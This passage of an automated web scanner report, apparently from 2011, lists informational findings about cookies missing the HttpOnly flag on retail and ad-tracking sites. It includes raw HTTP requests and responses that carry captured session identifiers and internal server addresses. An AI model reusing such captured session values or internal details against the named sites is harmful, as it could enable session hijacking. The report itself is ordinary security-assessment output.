logolink=15026564; path=/; domain=alaskaoregonwesternwashington.bbb.org
logolink=15026564; path=/; domain=bbb.org

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

13.134. http://segment-pixel.invitemedia.com/pixel previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://segment-pixel.invitemedia.com
Path:	/pixel

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

segments_p1="eJzjYuFo2czIxcIx5y0jFxfHnn3MAv82n3vHwsXM8S8cAHevCXM=";Version=1;Path=/;Domain=invitemedia.com;Expires=Tue, 15-May-2012 10:42:26 GMT;Max-Age=31536000

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

13.135. http://server.bhphotovideo.com/cm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://server.bhphotovideo.com
Path:	/cm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

90132819_login=1305541013018461671490132819; path=/
90132819_reset=1305541013;path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /cm?ci=90132819&st=1305510783215&vn1=4.2.15-AdTarget&ec=utf-8&pi=RootPage.jsp&ul=http%3A//www.bhphotovideo.com&tid=10&ti=1305541013259&fo=searchForm%3A0%3BNwsLtrSgnUp_Subscribe%3A1%3B&ac=-1%3AU&fi=0%3A0%3A%3B HTTP/1.1
Host: server.bhphotovideo.com
Proxy-Connection: keep-alive
Referer: http://www.bhphotovideo.com/bnh/controller/home?KW=BANNER2&img=bh_wl.gif
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cookieID=18154535221305509932941; CoreID6=70091305509949141053400; TestSess3=70091305509949141053400; 90132819_login=1305509951001684455490132819; 90132819_reset=1305510790; JSESSIONID=pfTcNQ5SFQ!-112699937

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 10:16:53 GMT
Server: Apache
P3P: CP="NON DSP COR CUR ADMo DEVo PSAo PSDo OUR IND ONL UNI PUR COM NAV INT DEM STA"
Set-Cookie: 90132819_login=1305541013018461671490132819; path=/
Set-Cookie: 90132819_reset=1305541013;path=/
Expires: Sun, 15 May 2011 16:16:53 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, pre-check=0, post-check=0, private
Pragma: no-cache
Content-Type: image/gif
Content-Length: 43

GIF89a.............!.......,........@..D..;

13.136. http://srv.clickfuse.com/pixels/create.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://srv.clickfuse.com
Path:	/pixels/create.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

criteo=tagged; expires=Wed, 15-Jun-2011 02:02:58 GMT; path=/; domain=.clickfuse.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

13.137. http://srv2.wa.marketingsolutions.yahoo.com/script/ScriptServlet previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://srv2.wa.marketingsolutions.yahoo.com
Path:	/script/ScriptServlet

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

SYSTEM_USER_ID=FLRTMBVOCL8UVKO69ABBTHN724; Domain=.wa.marketingsolutions.yahoo.com; Expires=Fri, 15-May-2015 10:41:20 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

13.138. http://subscriptions.marvel.com/checkout/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://subscriptions.marvel.com
Path:	/checkout/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

split_nav_split=%2Fvar%2Fwww%2Fcom.marvel%2Fcom.marvel.frontend%2Fsites%2Fsubscriptions%2Fwww%2Fv3%2Ftemplates%2Fsub_nav.tmpl.htm; expires=Mon, 16-May-2011 12:36:20 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /checkout/ HTTP/1.1
Host: subscriptions.marvel.com
Proxy-Connection: keep-alive
Referer: http://subscriptions.marvel.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=luue98b2qr99ivbgtvj7dm65i7; __utma=125179656.1793272522.1305510243.1305510243.1305510243.1; __utmc=125179656; __utmz=125179656.1305510243.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)

Response

HTTP/1.1 302 Found
Date: Mon, 16 May 2011 10:36:20 GMT
Server: Apache
X-server-addr: 192.168.100.222
X-trying: 192.168.100.2
X-mysql: 192.168.100.2
Location: https://subscriptions.marvel.com/checkout/
Set-Cookie: split_nav_split=%2Fvar%2Fwww%2Fcom.marvel%2Fcom.marvel.frontend%2Fsites%2Fsubscriptions%2Fwww%2Fv3%2Ftemplates%2Fsub_nav.tmpl.htm; expires=Mon, 16-May-2011 12:36:20 GMT; path=/
Vary: Accept-Encoding
X-ServerNickName: Cap
Content-Type: text/html; charset=utf-8
Content-Length: 27160

<html>
<head>
<title>Marvel Subscriptions - Checkout</title>
<link rel="stylesheet" href="http://i.annihil.us/u/prod/sub/i/content/outcss/1292508188-v3-i-css-subs.css" type="text/css" media="screen
...[SNIP]...

13.139. http://sync.mathtag.com/sync/img previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sync.mathtag.com
Path:	/sync/img

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

ts=1305510879; domain=.mathtag.com; path=/; expires=Tue, 15-May-2012 01:54:39 GMT
mt_mop=5:1305510879|1:1305510843|9:1305510197; domain=.mathtag.com; path=/; expires=Tue, 15-May-2012 01:54:39 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

13.140. http://tags.mediaforge.com/if/50 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tags.mediaforge.com
Path:	/if/50

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

uID=Cqo6g03RAWdt2gOeC3Z5Ag==; expires=Tue, 15-May-12 10:50:15 GMT; domain=.mediaforge.com; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

13.141. http://trvlgrd.netmng.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://trvlgrd.netmng.com
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

evo5_TRAVELGUARD=8esftitq0xjod%7CmNZFPeMSBHHrkJOK7jnRMSoysnLE0dmNWb03gtHOALTDPO03KkwNiJKZPHw8SLn%2BnB4GM7SPo%2FBtyvgOARF7dDLcKE9KDQ2PQCiDLFHSz8J%2FsYb90p%2BlZaFHUa5vkxGGYQH5nCtMJjZfyWszWumCyNsnhINbVVoSIcQACgRzEbI5Zn4wbCzShugNKw3Tukjdbq0WZw46L32YBeHc1ofejw%3D%3D; expires=Tue, 15-Nov-2011 02:01:01 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /?aid=088&u3=tgdirect&u4=000329&u8=us_direct&u9=Live; HTTP/1.1
Host: trvlgrd.netmng.com
Proxy-Connection: keep-alive
Referer: http://www.travelguard.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=488b3b2b-2198-4f8a-bafb-65af73521f16; evo5_TRAVELGUARD=8esftitq0xjod%7CsxLTMe9Cr3h0%2FM5E807%2Be%2FxaKSnX5sL6Ex9uB%2BcxkmmjhZhpXMGT2%2B6sv5T%2FSe2rLY6ooL%2F9ms3VJvHnlPiIrCo3BbiigP%2FySWpw7KNO1qJ6NVDtND6NhTQIYMUURFDdYIgaWTrA5n7dke1eLHP7Vct76LaBNe1NhLtDq%2BS4Imd0mq7GtsqV4DMAU%2Bi7Q7t%2F72nZ92tGWUu9rRN%2FWa%2B7gg%3D%3D; evo5=csmq4atf04cxa%7CJeuRJCb45V6uwY1xci0duejpNnUE%2BOmzqGMogMAW%2FNCOqkjFJeQTtSSwFM8SExogUBVq3aRXr6rOPcqNTmIC7EZV1nRS%2FfrPyazw99gyUAJXaI4v2Tf%2FYK%2FYCGNRiTDa8FIC%2F1rDdFnvxSKmwnP9%2FzSswr%2BFnZEedqWLNPmJOGiD%2BKTS14anDruAemPci57rfbGvxyPHPZwrhH9c2PC0R7Ymr8xiYKFUBnazCBzOBnL2qGd20SpExMUheTADl1d0TTjVbjvJQVia2%2BYow6VA05s7EZxex6vE%2BvmQgXxXWwR2mefK966%2FeFMgLbGnQsm5mGE5l%2BYsVCNKIKht%2BM7JXtn8nweceJeqZuNgJnNvN7mezkeiy1MIOhXMGKv%2BHUozybOtALE61aKDO%2BSoPj%2BhNGduTlw4jjewTANsUadm4eJQ75KAJA1KpHCSrfNDIRnHjMMAwYuzMxzJA7OiUPCwQbVx7hAHs0TdLiuv7ZzwK309%2BcMucPBVwOOwAyb9yajE

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 02:01:01 GMT
Server: Apache/2.2.9
P3P: policyref="http://trvlgrd.netmng.com/w3c/p3p.xml", CP="NOI DSP COR DEVa PSAa OUR BUS COM NAV"
Expires: Sat, 14 May 2011 02:01:01 GMT
Last-Modified: Sat, 14 May 2011 02:01:01 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: evo5_TRAVELGUARD=8esftitq0xjod%7CmNZFPeMSBHHrkJOK7jnRMSoysnLE0dmNWb03gtHOALTDPO03KkwNiJKZPHw8SLn%2BnB4GM7SPo%2FBtyvgOARF7dDLcKE9KDQ2PQCiDLFHSz8J%2FsYb90p%2BlZaFHUa5vkxGGYQH5nCtMJjZfyWszWumCyNsnhINbVVoSIcQACgRzEbI5Zn4wbCzShugNKw3Tukjdbq0WZw46L32YBeHc1ofejw%3D%3D; expires=Tue, 15-Nov-2011 02:01:01 GMT; path=/
Content-Length: 205
Connection: close
Content-Type: text/html; charset=UTF-8

var remarketing_script=document.createElement("SCRIPT");remarketing_script.src=document.location.protocol+"//a.netmng.com/?aid=088";document.getElementsByTagName("head")[0].appendChild(remarketing_scr
...[SNIP]...

13.142. http://uat.netmng.com/pixel/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://uat.netmng.com
Path:	/pixel/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

evo5=csmq4atf04cxa%7CJeuRJCb45V6uwY1xci0duejpNnUE%2BOmzqGMogMAW%2FNCOqkjFJeQTtSSwFM8SExogUBVq3aRXr6rOPcqNTmIC7EZV1nRS%2FfrPyazw99gyUAJXaI4v2Tf%2FYK%2FYCGNRiTDa8FIC%2F1rDdFnvxSKmwnP9%2FzSswr%2BFnZEedqWLNPmJOGiD%2BKTS14anDruAemPci57rfbGvxyPHPZwrhH9c2PC0R7Ymr8xiYKFUBnazCBzOBnL2qGd20SpExMUheTADl1d0TTjVbjvJQVia2%2BYow6VA05s7EZxex6vE%2BvmQgXxXWwR2mefK966%2FeFMgLbGnQsm5mGE5l%2BYsVCNKIKht%2BM7JXtn8nweceJeqZuNgJnNvN7mezkeiy1MIOhXMGKv%2BHUozybOtALE61aKDO%2BSoPj%2BhNGduTlw4jjewTANsUadm4eJQ75KAJA1KpHCSrfNDIRnHjMMAwYuzMxzJA7OiUPCwQbVx7hAHs0TdLiuv7ZzwK309%2BcMucPBVwOOwAyb9yajE; expires=Tue, 15-Nov-2011 01:54:21 GMT; path=/; domain=.netmng.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

13.143. http://web.aisle7.net/jsapi/1.0/content.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://web.aisle7.net
Path:	/jsapi/1.0/content.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

aisle7c6=4090937773.1.3050751168.2719681593; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /jsapi/1.0/content.js HTTP/1.1
Host: web.aisle7.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.gnc.com/home/index.jsp?rdir=1A

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 10:52:48 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: public
Last-Modified: Thu, 12 May 2011 04:06:21 GMT
Content-Type: text/javascript
Set-Cookie: aisle7c6=4090937773.1.3050751168.2719681593; path=/
Content-Length: 71512

if (!window['$hnj'] || !$hnj.registry.included('/scripts/libraries/jquery/core.js')) {
(function(){var W=this,ab,F=W.jQuery,S=W.$,T=W.jQuery=W.$=function(b,a){return new T.fn.init(b,a)},M=/^[^<]*(
...[SNIP]...

13.144. http://www.acehardware.com/category/index.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.acehardware.com
Path:	/category/index.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

rvdata=XR240e18041a5b4616591440465b0a0a0304; expires=Saturday, 03-Jun-2079 14:01:27 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /category/index.jsp?categoryId=2568444&clickid=topnav_lawn HTTP/1.1
Host: www.acehardware.com
Proxy-Connection: keep-alive
Referer: http://www.acehardware.com/home/index.jsp?rdir=1A
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: browser_id=125602208394; __g_c=w%3A0; __utmz=185450681.1305510171.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); JSESSIONID=TvPJNRQL1JzcpcpJnj2HmqWGjbpjhg5fysv1FyGr3Ccf5w1KDJLQ!376193557; fsr.session={"v":1,"rid":"1305510186434_570135","pv":3,"to":5,"c":"https://www.acehardware.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"f":1305542837486}; __utma=185450681.2052200100.1305510171.1305510171.1305542835.2; __utmc=185450681; __utmb=185450681.2.10.1305542835; fsr.a=1305542839068; s_pers=%20s_nr%3D1305511373000%7C1308103373000%3B%20s_lastvisit%3D1305542825522%7C1400150825522%3B%20gpv_p27%3DHome%2520Page%7C1305544639235%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dgsicace%253D%252526pid%25253DHome%25252520Page%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.acehardware.com/category/index.jsp%2525253FcategoryId%2525253D2568444%252526ot%25253DA%3B

Response

13.145. http://www.bhphotovideo.com/bnh/controller/home previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bhphotovideo.com
Path:	/bnh/controller/home

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

TS29f0cc=7f329831c9f74bab89d73187e3b1cfd8871d7ea6dc67d58e4dd0837960ac0ec5a2f86729b092ce85bc587bdd; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /bnh/controller/home?KW=BANNER2&img=bh_wl.gif HTTP/1.1
Host: www.bhphotovideo.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=0pnRNQQMwR!-112699937; cookieID=18154535221305509932941; TS29f0cc=d35b183be3c07378b7d4c90c4d1f57e3871d7ea6dc67d58e4dd0802d60ac0ec5a2f86729b092ce85bc587bdd; cmTPSet=Y

Response

13.146. http://www.bluefly.com/__ssobj/ard.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bluefly.com
Path:	/__ssobj/ard.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

TS18d374=0ff07cecafdfb94efdbdc38c51098cdedc25568252c8426a4dd0857b; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /__ssobj/ard.png?5607126572844751644_1_1115-1-1305510889 HTTP/1.1
Host: www.bluefly.com
Proxy-Connection: keep-alive
Referer: http://www.bluefly.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SSID=AwCK-CkAAAAA6YPQTRybEAHpg9BNAQDpg9BNAAAAAAAAAADpg9BNAQA6AAAAWwQAAAI; SSSC=1.G5607126572844751644.1.58.1115; SSOD=AGHw_gAA; SSLB=1; SSRT=64PQTQE; TLTHID=7D2A76E47F5F107F24CCB1BBDF37F7B5; TLTSID=7D2A76E47F5F107F24CCB1BBDF37F7B5; JSESSIONID=ONzgfawlrUIPLStla7ZseA**.bluefly_node4; _714bc2c9=guest; CS_TRACKER_ID=ONzgfawlrUIPLStla7ZseA**.bluefly_node4; TS18d374=f627709e7890e7b2182df7e64b5a37d2dc25568252c8426a4dd083eb

Response

HTTP/1.1 204 No Content
Date: Mon, 16 May 2011 02:01:31 GMT
Last-Modified: Wed, 05 Aug 2009 23:54:00 GMT
ETag: "2c-0-4706db78c1600"
Accept-Ranges: bytes
Content-Length: 0
Expires: -1
Pragma: no-cache
Cache-Control: private, no-store, no-cache, max-age=0, must-revalidate, proxy-revalidate
RTSS: 1
Set-Cookie: TS18d374=0ff07cecafdfb94efdbdc38c51098cdedc25568252c8426a4dd0857b; Path=/

13.147. http://www.bluefly.com/__ssobj/core.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bluefly.com
Path:	/__ssobj/core.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

TS18d374=f627709e7890e7b2182df7e64b5a37d2dc25568252c8426a4dd083eb; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /__ssobj/core.js HTTP/1.1
Host: www.bluefly.com
Proxy-Connection: keep-alive
Referer: http://www.bluefly.com/myfly/login.jsp;jsessionid=ONzgfawlrUIPLStla7ZseA**.bluefly_node4
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SSID=AwCK-CkAAAAA6YPQTRybEAHpg9BNAQDpg9BNAAAAAAAAAADpg9BNAQA6AAAAWwQAAAI; SSSC=1.G5607126572844751644.1.58.1115; SSOD=AGHw_gAA; TLTSID=7D2A76E47F5F107F24CCB1BBDF37F7B5; JSESSIONID=ONzgfawlrUIPLStla7ZseA**.bluefly_node4; _714bc2c9=guest; CS_TRACKER_ID=ONzgfawlrUIPLStla7ZseA**.bluefly_node4; __utmz=9200358.1305510900.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=9200358.576523501.1305510900.1305510900.1305510900.1; __utmc=9200358; __utmb=9200358.1.10.1305510900; cmTPSet=Y; mr_referredVisitor=0; bn_u=6923549130717770549; bn_cd=d%26g%26s%26r%3D0.1; bnTrail=%5B%22http%3A%2F%2Fwww.bluefly.com%2F%22%5D; CoreAt=; SSLB=1; SSRT=24TQTQE; TLTHID=0BB9DB2A7F60107F22099FFA97D9051C; TS18d374=f627709e7890e7b2182df7e64b5a37d2dc25568252c8426a4dd083eb; cmRS=&t1=1305510900223&t2=1305510909795&t3=1305511132981&lti=1305511130581&ln=&hr=/myfly/login.jsp%3Bjsessionid%3DONzgfawlrUIPLStla7ZseA**.bluefly_node4&fti=&fn=keyword_search_0%3A0%3B&ac=&fd=&uer=&fu=&pi=&ho=core.bluefly.com/cm%3F&ci=90039438

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:58:52 GMT
Last-Modified: Wed, 05 Aug 2009 23:54:00 GMT
ETag: "2c-0-4706db78c1600"
Accept-Ranges: bytes
Expires: Mon, 23 May 2011 01:58:52 GMT
Cache-Control: private, max-age=604800
Vary: Accept-Encoding
RTSS: 1
Content-Type: application/javascript
Set-Cookie: TS18d374=f627709e7890e7b2182df7e64b5a37d2dc25568252c8426a4dd083eb; Path=/
Content-Length: 3771

/* Copyright 2010, SiteSpect, Inc. All Rights Reserved. */
(function(d,e){var a=d.document;var b=d.location;var c={};c.Cookie=function(f){var i="\v";function m(n,p,o){return encodeURIComponent(n)+"="+
...[SNIP]...

13.148. http://www.bluefly.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bluefly.com
Path:	/favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

TS18d374=f06f6803ce0a02994e7215640eaf99a1dc25568252c8426a4dd08600; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
Host: www.bluefly.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SSID=AwCK-CkAAAAA6YPQTRybEAHpg9BNAQDpg9BNAAAAAAAAAADpg9BNAQA6AAAAWwQAAAI; SSSC=1.G5607126572844751644.1.58.1115; SSOD=AGHw_gAA; SSLB=1; SSRT=64PQTQE; TLTHID=7D2A76E47F5F107F24CCB1BBDF37F7B5; TLTSID=7D2A76E47F5F107F24CCB1BBDF37F7B5; JSESSIONID=ONzgfawlrUIPLStla7ZseA**.bluefly_node4; _714bc2c9=guest; CS_TRACKER_ID=ONzgfawlrUIPLStla7ZseA**.bluefly_node4; TS18d374=f627709e7890e7b2182df7e64b5a37d2dc25568252c8426a4dd083eb; __utmz=9200358.1305510900.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=9200358.576523501.1305510900.1305510900.1305510900.1; __utmc=9200358; __utmb=9200358.1.10.1305510900; cmTPSet=Y; CoreAt=; mr_referredVisitor=0; bn_u=6923549130717770549; bn_cd=d%26g%26s%26r%3D0.1

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 02:03:44 GMT
Last-Modified: Mon, 18 Aug 2008 12:14:25 GMT
ETag: "187f-e36-454bae9806a40"
Accept-Ranges: bytes
Vary: Accept-Encoding
Age: 43
RTSS: 1
Content-Type: image/x-icon
Set-Cookie: TS18d374=f06f6803ce0a02994e7215640eaf99a1dc25568252c8426a4dd08600; Path=/
Content-Length: 3638

..............h...&... ..............(....... ...........@.............................................................................................................................................
...[SNIP]...

13.149. http://www.bluefly.com/myfly/forgot_password.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bluefly.com
Path:	/myfly/forgot_password.jsp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

SSID=AwA6gCkAAAAA6YPQTRybEAHpg9BNAgAAAAAAAAAAAAAAAADm_dBNAAAAAAAAAAAAAAA; path=/; domain=.bluefly.com; expires=Tue, 15-May-2012 10:35:18 GMT
SSSC=1.G5607126572844751644.2.0.0; path=/; domain=.bluefly.com
SSRT=5v3QTQE; path=/; domain=.bluefly.com; expires=Tue, 15-May-2012 10:35:18 GMT
TLTHID=31B28F287FA8107F30ACA5F8317B6541; Path=/; Domain=.bluefly.com
TS18d374=e7ab75325d7e77e85138a8025c5c042cdc25568252c8426a4dd0fde6; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

13.150. http://www.bluefly.com/myfly/login.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bluefly.com
Path:	/myfly/login.jsp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

SSRT=xYbQTQE; path=/; domain=.bluefly.com; expires=Tue, 15-May-2012 02:07:01 GMT
TLTHID=2FF624847F61107F23939AFFB4D3A655; Path=/; Domain=.bluefly.com
TS18d374=abc710a5695fda7f92b304b93d86d0cedc25568252c8426a4dd086c5; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

13.151. http://www.bluenile.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bluenile.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

bnper=ver~3; Domain=.bluenile.com; Expires=Thu, 13-May-2021 02:03:01 GMT; Path=/
bnper=CONTEXT-NAME~53&ver~3; Domain=.bluenile.com; Expires=Thu, 13-May-2021 02:03:01 GMT; Path=/
bnper=CONTEXT-NAME~53&CURR~USD&ver~3; Domain=.bluenile.com; Expires=Thu, 13-May-2021 02:03:01 GMT; Path=/
bnper=CONTEXT-NAME~53&CURR~USD&ver~3&CURR_SYM~%24; Domain=.bluenile.com; Expires=Thu, 13-May-2021 02:03:01 GMT; Path=/
GUID=C1D03AAB_3A5C_4245_82B9_9C5170C3BA74; Domain=.bluenile.com; Expires=Thu, 22-Jan-2043 03:49:41 GMT; Path=/
bnper=NIB~0&CONTEXT-NAME~53&ver~3&CURR~USD&CURR_SYM~%24; Domain=.bluenile.com; Expires=Thu, 13-May-2021 02:03:01 GMT; Path=/
bnses=ver~1; Domain=.bluenile.com; Path=/
bnses=new~true&ver~1; Domain=.bluenile.com; Path=/
stc=3NZ93G; Domain=.bluenile.com; Expires=Sat, 12-Nov-2011 02:03:01 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

13.152. http://www.bluenile.com/build-your-own-diamond-ring previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bluenile.com
Path:	/build-your-own-diamond-ring

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

dsearch=ver~4&visibleBYOR~800000000&stateBYOR~RD-23-1567-------319.0-1558631.0-----------0------0%2C0%2C0-price-asc-USD--2%2C3%2C4%2C5%2C6-; Domain=.bluenile.com; Expires=Wed, 15-May-2013 10:36:16 GMT; Path=/
stc=3NZR3Q; Domain=.bluenile.com; Expires=Sat, 12-Nov-2011 10:36:16 GMT; Path=/
bld=ver~3&BYOR~DIAMONDS_STEP-DIAMONDS_STEP-0---; Domain=.bluenile.com; Expires=Wed, 15-May-2013 10:36:16 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

13.153. http://www.bluenile.com/channel-recommendations.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bluenile.com
Path:	/channel-recommendations.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

bnses=new~false&ver~1; Domain=.bluenile.com; Path=/
stc=3NZR3Q; Domain=.bluenile.com; Expires=Sat, 12-Nov-2011 02:04:13 GMT; Path=/
bnper=ver~3&NIB~0&CURR~USD&CURR_SYM~%24&CONTEXT-NAME~53&DM~-&SUB~false; Domain=.bluenile.com; Expires=Thu, 13-May-2021 02:04:13 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

13.154. http://www.bluenile.com/fbc/setStatus.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bluenile.com
Path:	/fbc/setStatus.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

